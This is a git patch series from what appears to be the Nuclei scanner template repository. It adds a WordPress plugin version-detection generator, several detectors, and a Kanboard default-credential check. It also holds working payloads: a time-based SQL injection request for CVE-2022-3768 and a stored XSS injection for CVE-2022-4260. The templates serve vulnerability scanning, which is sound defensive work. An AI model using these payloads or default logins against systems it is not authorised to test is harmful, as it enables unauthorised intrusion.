.../workflows/wordpress-plugins-update.yml | 44 +++++ 3 files changed, 228 insertions(+) create mode 100644 .github/scripts/wordpress-plugins-update-requirements.txt create mode 100644 .github/scripts/wordpress-plugins-update.py create mode 100644 .github/workflows/wordpress-plugins-update.yml diff --git a/.github/scripts/wordpress-plugins-update-requirements.txt b/.github/scripts/wordpress-plugins-update-requirements.txt new file mode 100644 index 0000000000..1271cdcb38 --- /dev/null +++ b/.github/scripts/wordpress-plugins-update-requirements.txt @@ -0,0 +1,10 @@ +beautifulsoup4==4.11.1 +bs4==0.0.1 +certifi==2022.9.24 +charset-normalizer==2.1.1 +idna==3.4 +Markdown==3.4.1 +requests==2.28.1 +soupsieve==2.3.2.post1 +termcolor==2.1.1 +urllib3==1.26.13 diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py new file mode 100644 index 0000000000..c2c87d370f --- /dev/null +++ b/.github/scripts/wordpress-plugins-update.py @@ -0,0 +1,174 @@ +#!/usr/bin/env python3 + +''' +This script reads the URL https://wordpress.org/plugins/browse/popular/ until page 10, extract each plugin name and namespace, +then in http://plugins.svn.wordpress.org/ website, looks for the "Stable tag" inside the readme.txt and extract the last version +number from trunk branch. Finally generates a template and a payload file with last version number to be used during scan that +compares the detect version with the payload version. + +The generated template also includes the tags top-100 and top-200 allowing filtering. + +e.g. +nuclei -t technologies/wordpress/plugins -tags top-100 -u https://www.example.com +''' + +__author__ = "ricardomaia" + +from time import sleep +from bs4 import BeautifulSoup +import requests +import re +from markdown import markdown +from termcolor import colored, cprint + +# Regex to extract the name of th plugin from the URL +regex = r"https://wordpress.org/plugins/(\w.+)/" + +ranking = 1 + +# Top 200 Wordpress Plugins +for page_number in range(1, 11): + + html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}", headers={ + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", + "Accept-Language": "en-US,en;q=0.9", + "Accept-Encoding": "gzip, deflate", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "Connection": "keep-alive", + "Upgrade-Insecure-Requests": "1", + "Cache-Control": "max-age=0", + "Pragma": "no-cache", + }).content + + # Parse HTML + soup = BeautifulSoup(html, 'html.parser') + results = soup.find(id="main") + articles = results.find_all("article", class_="plugin-card") + + # Setting the top tag + top_tag = "top-100,top-200" if page_number <= 5 else "top-200" + + # Get each plugin in the page + for article in articles: + + full_title = article.find("h3", class_="entry-title").get_text() + regex_remove_quotes = r"[\"`:]" + subst_remove_quotes = "'" + title = re.sub(regex_remove_quotes, subst_remove_quotes, full_title) + + link = article.find("a").get("href") + name = re.search(regex, link).group(1) + + cprint(f"Title: {title}", "cyan") + cprint(f"Link: {link}", "yellow") + cprint(f"Name: {name} - Ranking: {ranking}", "green") + print(f"Page Number: {page_number}") + print(f"Top Tag: {top_tag}") + print(f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt") + ranking += 1 + + sleep(0.2) + + # Get the readme.txt file from SVN + readme = requests.get( + url=f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt", + headers={ + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7,es;q=0.6", + "Cache-Control": "no-cache", + "Connection": "keep-alive", + "Host": "plugins.svn.wordpress.org", + "Pragma": "no-cache", + "Upgrade-Insecure-Requests": "1", + "Referer": "http://plugins.svn.wordpress.org/{name}/trunk/"}).content + + # Extract the plugin version + try: + version = re.search(r"(?i)Stable.tag:\s+([\w.]+)", + readme.decode("utf-8")).group(1) + except: + version = "N/A" + + # Extract the plugin description + try: + description_markdown = re.search( + r"(?i)==.Description.==\W+\n?(.*)", readme.decode("utf-8")).group(1) + html = markdown(description_markdown) + full_description = BeautifulSoup(html, 'html.parser').get_text() + regex_max_length = r"(\b.{80}\b)" + subst_max_lenght = "\\g<1>\\n " + description = re.sub( + regex_max_length, subst_max_lenght, full_description, 0, re.MULTILINE) + except: + description = "N/A" + + print(f"Version: {version}") + print(f"Description: {description}") + + # Write the plugin template to file + template = f'''id: wordpress-{name} + +info: + name: {title} Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/{name}/ + metadata: + plugin_namespace: {name} + wpscan: https://wpscan.com/plugin/{name} + tags: tech,wordpress,wp-plugin,{top_tag} + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/{name}.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' +''' + version_file = open( + f"./nuclei-templates/helpers/wordpress/plugins/{name}.txt", "w") + version_file.write(version) + version_file.close() + + # print(template) + template_file = open( + f"./nuclei-templates/technologies/wordpress/plugins/{name}.yaml", "w") + template_file.write(template) + template_file.close() + + print("--------------------------------------------") + print("\n") diff --git a/.github/workflows/wordpress-plugins-update.yml b/.github/workflows/wordpress-plugins-update.yml new file mode 100644 index 0000000000..63bdc67c3c --- /dev/null +++ b/.github/workflows/wordpress-plugins-update.yml @@ -0,0 +1,44 @@ +name: ✨ WordPress Plugins - Update +on: + schedule: + - cron: "0 4 * * *" # every day at 4am UTC + workflow_dispatch: +jobs: + Update: + runs-on: ubuntu-latest + steps: + - name: Install tree + run: sudo apt-get install tree -y + + - name: Check out repository code + uses: actions/checkout@v3 + with: + persist-credentials: false # otherwise, the token used is the GITHUB_TOKEN, instead of your personal token + fetch-depth: 0 # otherwise, you will failed to push refs to dest repo + + - name: Install Python3 + uses: actions/setup-python@v4 + with: + python-version: "3.10" + - run: | + python -m pip install --upgrade pip + pip install -r .github/scripts/wordpress-plugins-update-requirements.txt + + - name: Update Templates + run: | + python3 .github/scripts/wordpress-plugins-update.py + git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT + + - name: Commit files + if: steps.readme-update.outputs.CHANGES > 0 + run: | + git config --local user.email "action@github.com" + git config --local user.name "GitHub Action" + git commit -m "Auto WordPress Plugins Update [$(date)] :robot:" -a + + - name: Push changes + if: steps.readme-update.outputs.CHANGES > 0 + uses: ad-m/github-push-action@master + with: + github_token: ${{ secrets.TOKEN }} + branch: ${{ github.ref }} From c06f2dbf73f2cf6ad89bec7d03ee9fb5b91613b1 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 26 Dec 2022 21:23:08 +0530 Subject: [PATCH 0634/1133] template path fix in workflow (#6432) --- .github/scripts/wordpress-plugins-update.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py index c2c87d370f..501437872e 100644 --- a/.github/scripts/wordpress-plugins-update.py +++ b/.github/scripts/wordpress-plugins-update.py @@ -160,13 +160,13 @@ requests: - '(?i)Stable.tag:\s?([\w.]+)' ''' version_file = open( - f"./nuclei-templates/helpers/wordpress/plugins/{name}.txt", "w") + f"helpers/wordpress/plugins/{name}.txt", "w") version_file.write(version) version_file.close() # print(template) template_file = open( - f"./nuclei-templates/technologies/wordpress/plugins/{name}.yaml", "w") + f"technologies/wordpress/plugins/{name}.yaml", "w") template_file.write(template) template_file.close() From 284b38e0a123a981ff4486bb29d52c7ca6afc0aa Mon Sep 17 00:00:00 2001 From: JoshMorrison99 Date: Mon, 26 Dec 2022 18:14:40 -0500 Subject: [PATCH 0635/1133] Create kanboard-default-login.yaml --- default-logins/kanboard-default-login.yaml | 59 ++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 default-logins/kanboard-default-login.yaml diff --git a/default-logins/kanboard-default-login.yaml b/default-logins/kanboard-default-login.yaml new file mode 100644 index 0000000000..055ead8783 --- /dev/null +++ b/default-logins/kanboard-default-login.yaml @@ -0,0 +1,59 @@ +id: kanboard-default-login + +info: + name: Kanboard Default Login + author: shelled + severity: high + description: Kanboard default login was discovered. + reference: + - https://twitter.com/0x_rood/status/1607068644634157059 + - https://github.com/kanboard/kanboard + - https://docs.kanboard.org/v1/admin/installation/ + metadata: + verified: true + tags: default-login,kanboard + +requests: + - raw: + - | + GET /?controller=AuthController&action=login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /?controller=AuthController&action=check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{user}}&password={{pass}}&csrf_token={{token}} + + - | + GET /?controller=DashboardController&action=show HTTP/1.1 + Host: {{Hostname}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - admin + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - 'kanboard' + - 'admin' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: token + part: body + regex: + - '([a-f0-9]{64})' + internal: true From e2b70183667cf3c4db65b27b8bbcaf8a98b2618d Mon Sep 17 00:00:00 2001 From: nodauf Date: Tue, 27 Dec 2022 11:50:28 +0100 Subject: [PATCH 0636/1133] Add Liferay favicon --- technologies/favicon-detection.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 85d895d826..2a3ea66143 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -2640,3 +2640,8 @@ requests: name: "Leica RefWorx" dsl: - "status_code==200 && (\"-1054477011\" == mmh3(base64_py(body)))" + + - type: dsl + name: "Liferay" + dsl: + - "status_code==200 && (\"-2024949122\" == mmh3(base64_py(body)))" From 197d84a3e0b0e0d158d6ea172681f9fc41154930 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 27 Dec 2022 16:47:00 +0530 Subject: [PATCH 0637/1133] format-changes --- misconfiguration/installer/concrete-installer.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/misconfiguration/installer/concrete-installer.yaml b/misconfiguration/installer/concrete-installer.yaml index 8550ef635e..10bba3dccf 100644 --- a/misconfiguration/installer/concrete-installer.yaml +++ b/misconfiguration/installer/concrete-installer.yaml @@ -12,7 +12,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/index.php/install' + - "{{BaseURL}}/index.php/install" matchers-condition: and matchers: @@ -23,6 +23,7 @@ requests: - "choose language" condition: and case-insensitive: true + - type: word part: header words: From 0ba241805ceeff7a34694cec885e605a8fa24bf8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 27 Dec 2022 16:53:01 +0530 Subject: [PATCH 0638/1133] fix-yaml-lint --- default-logins/kanboard-default-login.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/default-logins/kanboard-default-login.yaml b/default-logins/kanboard-default-login.yaml index 055ead8783..ef8f91ce48 100644 --- a/default-logins/kanboard-default-login.yaml +++ b/default-logins/kanboard-default-login.yaml @@ -18,18 +18,18 @@ requests: - | GET /?controller=AuthController&action=login HTTP/1.1 Host: {{Hostname}} - + - | POST /?controller=AuthController&action=check HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - + username={{user}}&password={{pass}}&csrf_token={{token}} - + - | GET /?controller=DashboardController&action=show HTTP/1.1 Host: {{Hostname}} - + attack: pitchfork payloads: user: From 9b7c40b460566297038ef52b129a4cbda3180a58 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 27 Dec 2022 16:59:02 +0530 Subject: [PATCH 0639/1133] fix-yaml-lint --- technologies/favicon-detection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 2a3ea66143..e427f99e70 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -2640,7 +2640,7 @@ requests: name: "Leica RefWorx" dsl: - "status_code==200 && (\"-1054477011\" == mmh3(base64_py(body)))" - + - type: dsl name: "Liferay" dsl: From 232abe79cf5cfef51109d79e7f79ad2e044fbc9c Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 27 Dec 2022 16:59:35 +0530 Subject: [PATCH 0640/1133] minor -update --- iot/raspberry-shake-config.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/iot/raspberry-shake-config.yaml b/iot/raspberry-shake-config.yaml index 8544d62e55..da6b13db3d 100644 --- a/iot/raspberry-shake-config.yaml +++ b/iot/raspberry-shake-config.yaml @@ -7,6 +7,7 @@ info: description: | The Shake Board digitizer receives, processes, and interprets the sensor data in real-time, allowing for the Raspberry Pi computer to export the data for easy access. The data output can be displayed and analyzed using our own comprehensive set of web tools or any standard seismological software. metadata: + verified: true shodan-query: title:"Raspberry Shake Config" tags: misconfig,unauth,iot,raspberry From 546497aaf905a46c401d2bad8abd9dd61e879e75 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 27 Dec 2022 17:05:24 +0530 Subject: [PATCH 0641/1133] formatting-fix --- iot/raspberry-shake-config.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/iot/raspberry-shake-config.yaml b/iot/raspberry-shake-config.yaml index da6b13db3d..a9e02ec00c 100644 --- a/iot/raspberry-shake-config.yaml +++ b/iot/raspberry-shake-config.yaml @@ -22,6 +22,7 @@ requests: part: body words: - "Raspberry Shake Config" + - type: status status: - 200 From 4c847ecb897ecb5d1d6652779271e23d9126a1d4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 27 Dec 2022 17:15:18 +0530 Subject: [PATCH 0642/1133] shodan-query-added --- default-logins/kanboard-default-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/default-logins/kanboard-default-login.yaml b/default-logins/kanboard-default-login.yaml index ef8f91ce48..cd1b6ab27d 100644 --- a/default-logins/kanboard-default-login.yaml +++ b/default-logins/kanboard-default-login.yaml @@ -11,6 +11,7 @@ info: - https://docs.kanboard.org/v1/admin/installation/ metadata: verified: true + shodan-query: http.favicon.hash:2056442365 tags: default-login,kanboard requests: From d089a98e3360af1edd170f6fb45fd5ffc8d9996b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 27 Dec 2022 17:27:46 +0530 Subject: [PATCH 0643/1133] kanboard-login --- exposed-panels/kanboard-login.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposed-panels/kanboard-login.yaml diff --git a/exposed-panels/kanboard-login.yaml b/exposed-panels/kanboard-login.yaml new file mode 100644 index 0000000000..69eea93f40 --- /dev/null +++ b/exposed-panels/kanboard-login.yaml @@ -0,0 +1,30 @@ +id: kanboard-login + +info: + name: Kanboard Login Panel + author: DhiyaneshDK + severity: info + description: A Kanboard login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + verified: true + shodan-query: http.favicon.hash:2056442365 + tags: panel,kanboard + +requests: + - method: GET + path: + - '{{BaseURL}}' + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - '/?controller=UserAjaxController&action=status' + + - type: status + status: + - 200 From ff14e71422d8afc10b6fb3712aff67625acf09b8 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 27 Dec 2022 19:30:11 +0530 Subject: [PATCH 0644/1133] csrf regex -update --- default-logins/kanboard-default-login.yaml | 25 +++++++++++----------- 1 file changed, 13 insertions(+), 12 deletions(-) diff --git a/default-logins/kanboard-default-login.yaml b/default-logins/kanboard-default-login.yaml index cd1b6ab27d..2e10333c51 100644 --- a/default-logins/kanboard-default-login.yaml +++ b/default-logins/kanboard-default-login.yaml @@ -25,7 +25,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - username={{user}}&password={{pass}}&csrf_token={{token}} + username={{user}}&password={{pass}}&csrf_token={{csrf_token}} - | GET /?controller=DashboardController&action=show HTTP/1.1 @@ -37,24 +37,25 @@ requests: - admin pass: - admin - + extractors: + - type: regex + name: csrf_token + part: body + internal: true + group: 1 + regex: + - "hidden\" name=\"csrf_token\" value=\"([0-9a-z]+)\"" + cookie-reuse: true matchers-condition: and matchers: - type: word words: - - 'kanboard' - - 'admin' + - 'New project' + - 'Project management' condition: and + case-insensitive: true - type: status status: - 200 - - extractors: - - type: regex - name: token - part: body - regex: - - '([a-f0-9]{64})' - internal: true From cad9e85d7dbfd62318f2dcf63f80417ee68621c3 Mon Sep 17 00:00:00 2001 From: nybble04 Date: Tue, 27 Dec 2022 18:07:25 +0400 Subject: [PATCH 0645/1133] Add a postgresql server detection template --- network/detection/pgsql-detect.yaml | 30 +++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 network/detection/pgsql-detect.yaml diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml new file mode 100644 index 0000000000..fc8af112ce --- /dev/null +++ b/network/detection/pgsql-detect.yaml @@ -0,0 +1,30 @@ +id: pgsql-detect + +info: + name: Postgresql Detection + author: nybble04 + severity: info + description: | + Detects if a Postgresql RDBMS server is running on the target. + metadata: + verified: true + tags: network,postgresql,db + +network: + - inputs: + - data: "000000500003000075736572006e75636c6569006461746162617365006e75636c6569006170706c69636174696f6e5f6e616d65007073716c00636c69656e745f656e636f64696e6700555446380000" + type: hex + - data: "7000000036534352414d2d5348412d32353600000000206e2c2c6e3d2c723d000000000000000000000000000000000000000000000000" + type: hex + + host: + - "{{Hostname}}" + - "{{Host}}:5432" + read-size: 2048 + + matchers: + - type: word + part: body + words: + - "SCRAM-SHA-256" + - "Mpassword authentication failed for user" \ No newline at end of file From 0f783f11a181835d0735d88019c22c5cb0b19c52 Mon Sep 17 00:00:00 2001 From: nybble04 Date: Tue, 27 Dec 2022 18:15:09 +0400 Subject: [PATCH 0647/1133] Add newline EOF --- network/detection/pgsql-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml index fc8af112ce..6da590a504 100644 --- a/network/detection/pgsql-detect.yaml +++ b/network/detection/pgsql-detect.yaml @@ -27,4 +27,4 @@ network: part: body words: - "SCRAM-SHA-256" - - "Mpassword authentication failed for user" \ No newline at end of file + - "Mpassword authentication failed for user" From d5100959f616b36a55c17b1ce095fd21628eee7d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 27 Dec 2022 19:52:38 +0530 Subject: [PATCH 0648/1133] yaml init -update --- default-logins/kanboard-default-login.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/default-logins/kanboard-default-login.yaml b/default-logins/kanboard-default-login.yaml index 2e10333c51..ba7472dad9 100644 --- a/default-logins/kanboard-default-login.yaml +++ b/default-logins/kanboard-default-login.yaml @@ -45,7 +45,6 @@ requests: group: 1 regex: - "hidden\" name=\"csrf_token\" value=\"([0-9a-z]+)\"" - cookie-reuse: true matchers-condition: and matchers: From 27bd51d1e4660ff7e5a16a2602e32cfcea8e5f94 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 27 Dec 2022 14:32:24 +0000 Subject: [PATCH 0649/1133] Auto Generated CVE annotations [Tue Dec 27 14:32:24 UTC 2022] :robot: --- cves/2020/CVE-2020-35476.yaml | 3 ++- cves/2022/CVE-2022-23854.yaml | 3 ++- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index 88c9505ec1..866fd32df3 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -4,10 +4,11 @@ info: name: OpenTSDB <= 2.4.0 - Remote Code Execution author: pikpikcu severity: critical - description: "OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory." + description: OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. reference: - https://github.com/OpenTSDB/opentsdb/issues/2051 - https://nvd.nist.gov/vuln/detail/CVE-2020-35476 + - http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 diff --git a/cves/2022/CVE-2022-23854.yaml b/cves/2022/CVE-2022-23854.yaml index 15635ed27f..dd1f30bd82 100644 --- a/cves/2022/CVE-2022-23854.yaml +++ b/cves/2022/CVE-2022-23854.yaml @@ -10,11 +10,12 @@ info: - https://packetstormsecurity.com/files/cve/CVE-2022-23854 - https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854 + - https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02 classification: cve-id: CVE-2022-23854 metadata: - verified: true shodan-query: http.html:"InTouch Access Anywhere" + verified: "true" tags: lfi,packetstorm,cve,cve2022,aveva,intouch requests: From bd2faf2369f9a4736edbb5552a97822a91fcaa23 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 27 Dec 2022 21:40:38 +0530 Subject: [PATCH 0650/1133] added-login-request and matcher update --- cves/2022/CVE-2022-3768.yaml | 43 +++++++++++++++++------------------- 1 file changed, 20 insertions(+), 23 deletions(-) diff --git a/cves/2022/CVE-2022-3768.yaml b/cves/2022/CVE-2022-3768.yaml index df1f241502..6a15ca0e43 100644 --- a/cves/2022/CVE-2022-3768.yaml +++ b/cves/2022/CVE-2022-3768.yaml @@ -1,11 +1,12 @@ id: CVE-2022-3768 info: - name: WPSmartContracts < 1.3.12 - Author+ SQLi + name: WPSmartContracts < 1.3.12 - Author SQLi author: Hardik-Solanki severity: high description: | The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author + remediation: Fixed in version 1.3.12 reference: - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768 @@ -18,33 +19,29 @@ info: cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2022,wordpress,wp-plugin,wp,sql,WPSmartContracts + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-smart-contracts,authenticated requests: - raw: - | - GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(45)))hlAf)&uid=1 HTTP/1.1 + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1 Host: {{Hostname}} - unsafe: true - matchers-condition: and + cookie-reuse: true matchers: - - type: word - part: body - words: - - NFTs - - - type: word - part: body - words: - - Batch Mint NFTs - - - type: word - part: body - words: - - nft_page_nft-batch-mint + - type: dsl + dsl: + - 'duration_2>=5' + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "Batch Mint NFTs")' condition: and - - - type: status - status: - - 200 From f3e6069e81efbf609b128276f69f30a09b0a85c3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 27 Dec 2022 22:16:37 +0530 Subject: [PATCH 0651/1133] rewrote-template-scratch --- cves/2022/CVE-2022-4260.yaml | 71 ++++++++++++++++++++---------------- 1 file changed, 40 insertions(+), 31 deletions(-) diff --git a/cves/2022/CVE-2022-4260.yaml b/cves/2022/CVE-2022-4260.yaml index 698de995f0..15e66ccb69 100644 --- a/cves/2022/CVE-2022-4260.yaml +++ b/cves/2022/CVE-2022-4260.yaml @@ -1,11 +1,12 @@ id: CVE-2022-4260 info: - name: WP-Ban < 1.69.1 - Admin+ Stored XSS + name: WP-Ban < 1.69.1 - Admin Stored XSS author: Hardik-Solanki severity: high description: | The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). + remediation: Fixed in version 1.69.1 reference: - https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260 @@ -15,43 +16,51 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2022,xss,wordpress,wp-plugin,wp-ban + tags: cve,cve2022,wordpress,wp-plugin,wp,xss,wp-ban requests: - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + - | POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1 Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate - Referer: {{Hostname}}/wp-admin/options-general.php?page=wp-ban%2Fban-options.php - Content-Type: application/x-www-form-urlencoded - Origin: {{RootURL}} - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - _wpnonce=d65eec14d6&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28111%29%3B%3C%2Fscript%3E&Submit=Save+Changes - - - | - POST / HTTP/1.1 + + _wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes + + - | + GET / HTTP/1.1 Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate - Referer: XSS + Referer: XSS - matchers-condition: and + host-redirects: true + max-redirects: 2 + cookie-reuse: true + req-condition: true matchers: - - type: word - part: body - words: - - "" + - type: dsl + dsl: + - 'contains(body_4, "")' + - 'contains(content_type_4, "text/html")' + - 'status_code_4 == 200' + condition: and - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 + extractors: + - type: regex + name: nonce + part: body + group: 1 + regex: + - '_wpnonce=([0-9a-z]+)' + internal: true From 5ccd0c7bafbdcd8a065dc189de0ecdf58900c266 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 27 Dec 2022 22:17:12 +0530 Subject: [PATCH 0652/1133] tag-added --- cves/2022/CVE-2022-4260.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-4260.yaml b/cves/2022/CVE-2022-4260.yaml index 15e66ccb69..878c3af317 100644 --- a/cves/2022/CVE-2022-4260.yaml +++ b/cves/2022/CVE-2022-4260.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2022,wordpress,wp-plugin,wp,xss,wp-ban + tags: cve,cve2022,wordpress,wp-plugin,wp,xss,wp-ban,authenticated requests: - raw: From 7e23fae3b405bae7dc70c596f5c540793df3f1cf Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 27 Dec 2022 22:39:21 +0530 Subject: [PATCH 0653/1133] metadata & description -update --- network/detection/pgsql-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml index 6da590a504..9c67d50069 100644 --- a/network/detection/pgsql-detect.yaml +++ b/network/detection/pgsql-detect.yaml @@ -5,9 +5,10 @@ info: author: nybble04 severity: info description: | - Detects if a Postgresql RDBMS server is running on the target. + PostgreSQL, also known as Postgres, is a free and open-source relational database management system emphasizing extensibility and SQL compliance. metadata: verified: true + shodan-query: port:5432 product:"PostgreSQL" tags: network,postgresql,db network: From 5e632f0f7177b239cfeb3965b50be771b3a176e7 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Tue, 27 Dec 2022 13:11:49 -0500 Subject: [PATCH 0654/1133] Update webdav-exposed.yaml --- 